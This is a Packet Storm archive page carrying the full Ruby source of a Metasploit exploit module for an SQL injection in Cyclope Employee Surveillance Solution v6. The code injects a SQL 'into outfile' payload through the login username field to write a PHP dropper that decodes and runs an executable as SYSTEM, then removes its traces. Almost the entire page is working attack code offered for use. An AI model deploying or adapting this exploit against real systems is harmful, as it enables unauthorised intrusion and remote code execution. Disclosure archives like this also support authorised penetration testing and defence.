what you don't know can hurt you

Cyclope Employee Surveillance Solution 6 SQL Injection

Cyclope Employee Surveillance Solution 6 SQL Injection
Posted Aug 14, 2012
Authored by loneferret, sinn3r | Site metasploit.com

This Metasploit module exploits a SQL injection found in Cyclope Employee Surveillance Solution. Because the login script does not properly handle the user-supplied username parameter, a malicious user can manipulate the SQL query, and allows arbitrary code execution under the context of 'SYSTEM'.

tags | exploit, arbitrary, code execution, sql injection
advisories | OSVDB-84517
MD5 | 837146f8a3b99b3c8dfc3c6b60f22822

Cyclope Employee Surveillance Solution 6 SQL Injection

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE

def initialize(info={})
super(update_info(info,
'Name' => "Cyclope Employee Surveillance Solution v6 SQL Injection",
'Description' => %q{
This module exploits a SQL injection found in Cyclope Employee Surveillance
Solution. Because the login script does not properly handle the user-supplied
username parameter, a malicious user can manipulate the SQL query, and allows
arbitrary code execution under the context of 'SYSTEM'.
},
'License' => MSF_LICENSE,
'Author' =>
[
'loneferret', #Original discovery, PoC
'sinn3r' #Metasploit
],
'References' =>
[
['OSVDB', '84517'],
['EDB', '20393']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
'Targets' =>
[
['Cyclope Employee Surveillance Solution v6.2 or older', {}]
],
'Privileged' => false,
'DisclosureDate' => "Aug 8 2012",
'DefaultTarget' => 0))

register_options(
[
OptPort.new('RPORT', [true, "The web application's port", 7879]),
OptString.new('TARGETURI', [true, 'The base path to to the web application', '/'])
], self.class)
end

def check
peer = "#{rhost}:#{rport}"
path = File.dirname("#{target_uri.path}/.")
b64_version = get_version(path)
if b64_version.empty?
print_error("#{peer} - Unable to determine the version number")
else
b64_version = Rex::Text.decode_base64(b64_version)
if b64_version =~ /^[0-6]\.1/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end

return Exploit::CheckCode::Unknown
end


def get_version(path)
res = send_request_raw({'uri'=> "#{path}index.php"})
return '' if not res

v = res.body.scan(/\<link rel\=\"stylesheet\" type\=\"text\/css\" href\=\"([\w\=]+)\/css\/.+\" \/\>/).flatten[0]
return '' if not v

return v
end


def on_new_session(cli)
if cli.type != 'meterpreter'
print_error("Please remember to manually remove #{@exe_fname} and #{@php_fname}")
return
end

cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")

begin
print_status("Deleting #{@php_fname}")
cli.fs.file.rm(@php_fname)
rescue ::Exception => e
print_error("Please note: #{@php_fname} is stil on disk.")
end

begin
print_status("Deleting #{@exe_fname}")
cli.fs.file.rm(@exe_fname)
rescue ::Exception => e
print_error("Please note: #{@exe_fname} is still on disk.")
end
end


def get_php_payload(fname)
p = Rex::Text.encode_base64(generate_payload_exe)
php = %Q|
<?php
$f = fopen("#{fname}", "wb");
fwrite($f, base64_decode("#{p}"));
fclose($f);
exec("#{fname}");
?>
|
php = php.gsub(/^\t\t/, '').gsub(/\n/, ' ')
return php
end


def exploit
peer = "#{rhost}:#{rport}"
path = File.dirname("#{target_uri.path}/.")

#
# Need to fingerprint the version number in Base64 for the payload path
#
b64_version = get_version(path)
if b64_version.empty?
print_error("#{peer} - Unable to determine the version number")
return
end

print_status("#{peer} - Obtained version: #{Rex::Text.decode_base64(b64_version)}")

#
# Prepare our payload (naughty exe embedded in php)
#
@exe_fname = Rex::Text.rand_text_alpha(6) + '.exe'
@php_fname = Rex::Text.rand_text_alpha(6) + '.php'
php = get_php_payload(@exe_fname).unpack("H*")[0]
sqli = "x' or (SELECT 0x20 into outfile '/Progra~1/Cyclope/#{b64_version}/#{@php_fname}' LINES TERMINATED BY 0x#{php}) and '1'='1"

#
# Inject payload
#
print_status("#{peer} - Injecting PHP payload...")
res = send_request_cgi({
'method' => 'POST',
'uri' => path,
'vars_post' => {
'act' => 'auth-login',
'pag' => 'login',
'username' => sqli,
'password' => Rex::Text.rand_text_alpha(5)
}
})

#
# Load our payload
#
print_status("#{peer} - Loading payload: #{path}#{b64_version}/#{@php_fname}")
send_request_raw({'uri'=>"#{path}#{b64_version}/#{@php_fname}"})
if res and res.code == 404
print_error("#{peer} - Server returned 404, the upload attempt probably failed.")
return
end

handler
end

end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    16 Files
  • 18
    May 18th
    2 Files
  • 19
    May 19th
    1 Files
  • 20
    May 20th
    11 Files
  • 21
    May 21st
    21 Files
  • 22
    May 22nd
    20 Files
  • 23
    May 23rd
    36 Files
  • 24
    May 24th
    2 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close